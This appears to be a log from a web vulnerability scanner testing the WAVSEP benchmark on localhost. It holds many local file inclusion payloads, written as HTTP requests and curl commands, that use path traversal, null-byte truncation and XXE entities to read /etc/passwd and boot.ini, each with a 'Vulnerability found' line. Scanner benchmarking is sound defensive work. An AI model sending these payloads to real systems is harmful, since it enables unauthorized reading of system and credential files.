GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
